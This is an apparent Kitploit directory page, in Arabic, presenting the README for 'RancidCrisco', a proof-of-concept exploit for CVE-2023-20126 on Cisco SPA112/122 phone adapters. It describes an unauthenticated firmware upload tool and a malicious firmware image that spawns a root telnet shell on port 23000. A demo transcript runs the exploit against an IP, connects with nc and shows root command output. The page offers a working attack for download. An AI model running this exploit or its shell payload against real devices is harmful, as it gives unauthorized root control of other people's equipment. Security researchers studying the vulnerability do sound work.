Skip to content
KitploitKITPLOIT
أدواتعمليات الاستغلالالمدونة
Log in
إرسال
أدواتعمليات الاستغلالالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
أدوات/GitHubGitHub/fullspectrumdev/rancidcrisco
أمان الأنظمة المدمجةتحليل الثغرات الأمنيةالاستغلالاختبار الاختراقأمان الأجهزة وإنترنت الأشياءالفريق الأحمرأداة الوصول عن بعدتحليل البرامج الثابتة
GitHubfullspectrumdev/rancidcrisco

RancidCrisco

استغلال إثبات المفهوم لـ CVE-2023-20126 يستهدف محولات هواتف Cisco SPA. يرفع برنامجًا ثابتًا ضارًا للحصول على جذر الصدفة على المنفذ 23000/tcp عبر telnetd.

24225منذ 3 سنواتتمت المراجعة من قبل Kitploit

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
عرض المستودع

RancidCrisco

أدنى حد من الإثبات القابل للتطبيق لـ CVE-2023-20126

هذا هو الإصدار الأولي. إنه يعمل، لكنه استغلال 'أبسط حالة'.

تم اختباره ويعمل على SPA112/SPA122 - يتطلب SPA232D صورة برنامج ثابت مختلفة.

يعطي شيل جذر على المنفذ 23000/tcp.

ما زلت بحاجة إلى تنظيف سلسلة الأدوات المستخدمة لتحرير البرنامج الثابت وسأضعها على الأرجح في مستودع مختلف. إنها تعتمد بشكل أساسي على عمل @BigNerd95، ولكن مع تعديلات طفيفة للعمل مع ملفات البرنامج الثابت لـ SPA112/122.

عرض توضيحي.

$ python3 CVE-2023-20126.py http://192.168.0.152 CFW.bin 
Base URL: http://192.168.0.152
Firmware File: CFW.bin
Sending firmware update...
Firmware upgrade successful. Device will reboot eventually and be running the new FW.

< wait a few mins, nervously > 

$ nc -v 192.168.0.152 23000
Connection to 192.168.0.152 port 23000 [tcp/inovaport1] succeeded!
????????


BusyBox v1.10.2 (2019-10-14 12:41:41 CST) built-in shell (ash)
Enter 'help' for a list of built-in commands.

# id;uname -a;pwd
id;uname -a;pwd
uid=0(admin) gid=0(admin)
Linux SPA112 2.6.26.5 #1 PREEMPT Sun Sep 6 10:54:57 CST 2015 armv5tejl unknown
/
# cat /etc/version
cat /etc/version
router_major_version:1.4.1
router_minor_version:SR5
build_date:Mon Oct 14 12:48:12 CST 2019
build_version:6735
hardware_version:1.1.0

الملفات

  • fwupload.py - أداة رفع صورة البرنامج الثابت التي تتجاوز المصادقة بمجرد عدم إرسال أي شيء، مستغلة CVE-2023-20126. تأخذ وسيطين: عنوان URL لواجهة الويب للجهاز، وملف البرنامج الثابت لرفعه.
  • telnet-23000.bin - صورة برنامج ثابت خبيثة لإثبات المفهوم تقوم بتوليد telnetd -l /bin/sh -p 23000، مما يعطي شيل جذر على المنفذ 23000/tcp. بناءً على عمل bignerd95.

الترخيص

WTFPL.

الأخطاء

استخدم مشكلة git.

إخلاء مسؤولية

إذا قام هذا بتعطيل جهازك اللعين، فلا أتحمل أي مسؤولية.
هذه مشكلتك أنت.
أعني، لقد قمت بتجميع ذلك البرنامج الثابت المخترق في أمسية.
أيضًا، لماذا لا تتبع الشرح وتبني برنامجك الثابت المخترق بنفسك؟

تنزيل الأداة